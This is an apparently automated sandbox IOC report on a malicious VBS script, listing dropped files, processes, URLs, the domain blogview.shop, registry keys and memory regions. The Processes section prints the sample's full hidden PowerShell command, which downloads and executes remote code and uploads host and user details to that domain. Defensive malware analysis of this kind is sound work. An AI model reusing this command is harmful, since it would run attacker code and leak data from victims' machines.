IOC Report
sAKF0egIZ5.vbs

loading gif

Files

File Path
Type
Category
Malicious
sAKF0egIZ5.vbs
ASCII text, with very long lines (836), with CRLF, LF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ce5czcm.1zx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzcw4r15.alb.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sAKF0egIZ5.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://blogview.shop/api/values/38303529143438199171/refresh199/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://blogview.shop/api/values/refresh199',$drpy);}
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://blogview.shop/api/values/refresh199
unknown
malicious
https://blogview.shop/api/values/38303529143438199171/refresh199/
unknown
malicious
https://blogview.shop/api/values/
unknown
malicious
https://blogview.shop
unknown
malicious
https://blogview.shop/api/values/38303529143438199171/refresh199/9076518342.txt
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 6 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
blogview.shop
unknown
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2959CEB5000
heap
page read and write
malicious
25CA1C71000
trusted library allocation
page read and write
malicious
2959CC94000
heap
page read and write
malicious
2959CC19000
heap
page read and write
malicious
25CA02D6000
heap
page read and write
malicious
2959CC95000
heap
page read and write
malicious
25CA369D000
trusted library allocation
page read and write
malicious
2959CC88000
heap
page read and write
malicious
2959CC88000
heap
page read and write
malicious
2959CC46000
heap
page read and write
malicious
25CA0250000
heap
page read and write
malicious
25CA3342000
trusted library allocation
page read and write
7FFD3435C000
trusted library allocation
page execute and read and write
25CA1B80000
trusted library allocation
page read and write
25CBA0F0000
heap
page execute and read and write
2959E550000
heap
page read and write
BB0AB7E000
stack
page read and write
7FFD345B0000
trusted library allocation
page read and write
25CB1CDC000
trusted library allocation
page read and write
25CBA4AB000
heap
page read and write
25CB1C80000
trusted library allocation
page read and write
2959CC10000
heap
page read and write
25CB1C71000
trusted library allocation
page read and write
25CA0350000
heap
page read and write
7FFD345F0000
trusted library allocation
page read and write
7FFD342A2000
trusted library allocation
page read and write
25CBA1A5000
heap
page read and write
BB0AC7E000
stack
page read and write
25CA028E000
heap
page read and write
7FFD34360000
trusted library allocation
page execute and read and write
7FFD345C0000
trusted library allocation
page read and write
25CBA4E5000
heap
page read and write
E6671FE000
stack
page read and write
25CA3376000
trusted library allocation
page read and write
7FFD342A4000
trusted library allocation
page read and write
E666FFE000
stack
page read and write
E666DFF000
stack
page read and write
7FFD34470000
trusted library allocation
page execute and read and write
25CBA310000
heap
page read and write
25CBA205000
heap
page read and write
25CA0510000
heap
page read and write
7FFD34350000
trusted library allocation
page read and write
E6670FE000
stack
page read and write
25CA1C03000
trusted library allocation
page read and write
7FFD34580000
trusted library allocation
page read and write
25CB1E1F000
trusted library allocation
page read and write
25CA3498000
trusted library allocation
page read and write
25CA1C60000
heap
page execute and read and write
BB0B13B000
stack
page read and write
25CBA490000
heap
page read and write
25CA0298000
heap
page read and write
25CB9C79000
heap
page read and write
BB0A7AE000
stack
page read and write
2959CCC4000
heap
page read and write
25CA1BB0000
heap
page read and write
7FFD342FC000
trusted library allocation
page execute and read and write
25CBA4E3000
heap
page read and write
7FFD342A3000
trusted library allocation
page execute and read and write
25CBA0F7000
heap
page execute and read and write
25CBA4F1000
heap
page read and write
7FFD345E0000
trusted library allocation
page read and write
25CA1E9D000
trusted library allocation
page read and write
7FFD342C0000
trusted library allocation
page read and write
25CBA1DE000
heap
page read and write
BB0B0BF000
stack
page read and write
7FFD34460000
trusted library allocation
page execute and read and write
7DF4CEDC0000
trusted library allocation
page execute and read and write
25CA333C000
trusted library allocation
page read and write
2959CC70000
heap
page read and write
7FFD34530000
trusted library allocation
page read and write
25CBA4A0000
heap
page read and write
25CA38E3000
trusted library allocation
page read and write
7FFD344D0000
trusted library allocation
page read and write
7FFD34500000
trusted library allocation
page read and write
25CA381E000
trusted library allocation
page read and write
25CBA4FE000
heap
page read and write
25CA0220000
heap
page read and write
BB0A6E3000
stack
page read and write
7FFD34610000
trusted library allocation
page read and write
7FFD34560000
trusted library allocation
page read and write
2959CA90000
heap
page read and write
2959CEB0000
heap
page read and write
7FFD344F0000
trusted library allocation
page read and write
BB0AA7F000
stack
page read and write
7FFD34540000
trusted library allocation
page read and write
7FFD34386000
trusted library allocation
page execute and read and write
25CA1B70000
heap
page read and write
BB0AEFD000
stack
page read and write
7FFD342B0000
trusted library allocation
page read and write
25CBA4CC000
heap
page read and write
7FFD34490000
trusted library allocation
page execute and read and write
7FFD34440000
trusted library allocation
page read and write
25CA1CF5000
trusted library allocation
page read and write
BB0AAFD000
stack
page read and write
25CA1B30000
heap
page read and write
25CA0515000
heap
page read and write
7FFD34482000
trusted library allocation
page read and write
7FFD342BB000
trusted library allocation
page read and write
7FFD344C0000
trusted library allocation
page read and write
25CA289D000
trusted library allocation
page read and write
25CBA3F0000
heap
page execute and read and write
25CBA150000
heap
page read and write
E6672FB000
stack
page read and write
25CA0259000
heap
page read and write
25CA34F9000
trusted library allocation
page read and write
7FFD34570000
trusted library allocation
page read and write
25CA0140000
heap
page read and write
7FFD34520000
trusted library allocation
page read and write
2959CB90000
heap
page read and write
BB0ABFE000
stack
page read and write
E6673FF000
stack
page read and write
7FFD343C0000
trusted library allocation
page execute and read and write
BB0BB8E000
stack
page read and write
7FFD345D0000
trusted library allocation
page read and write
7FFD344E0000
trusted library allocation
page read and write
25CA3557000
trusted library allocation
page read and write
BB0AFBE000
stack
page read and write
BB0ACFE000
stack
page read and write
E666CFF000
stack
page read and write
25CA1BC0000
heap
page readonly
7FFD342AD000
trusted library allocation
page execute and read and write
25CA1B76000
heap
page read and write
25CA0345000
heap
page read and write
BB0BB0E000
stack
page read and write
25CA029A000
heap
page read and write
E6668FA000
stack
page read and write
7FFD34550000
trusted library allocation
page read and write
25CBA1A7000
heap
page read and write
25CBA2F0000
heap
page read and write
2959CC71000
heap
page read and write
25CA029E000
heap
page read and write
25CA1BA0000
trusted library allocation
page read and write
25CBA4E8000
heap
page read and write
BB0AD7E000
stack
page read and write
25CA1C00000
trusted library allocation
page read and write
E6669FE000
stack
page read and write
7FFD344A0000
trusted library allocation
page read and write
7FFD34451000
trusted library allocation
page read and write
25CBA4B8000
heap
page read and write
BB0A76D000
stack
page read and write
25CA3266000
trusted library allocation
page read and write
7FFD3445A000
trusted library allocation
page read and write
25CBA1FF000
heap
page read and write
7FFD345A0000
trusted library allocation
page read and write
25CA02AE000
heap
page read and write
25CA1C40000
trusted library allocation
page read and write
25CA026F000
heap
page read and write
E666AFE000
stack
page read and write
7FFD34510000
trusted library allocation
page read and write
25CA38E7000
trusted library allocation
page read and write
2959CB70000
heap
page read and write
BB0B03E000
stack
page read and write
7FFD34590000
trusted library allocation
page read and write
7FFD34356000
trusted library allocation
page read and write
BB0AE7E000
stack
page read and write
BB0ADFE000
stack
page read and write
7FFD344B0000
trusted library allocation
page read and write
7FFD34600000
trusted library allocation
page read and write
25CA36A7000
trusted library allocation
page read and write
There are 149 hidden memdumps, click here to show them.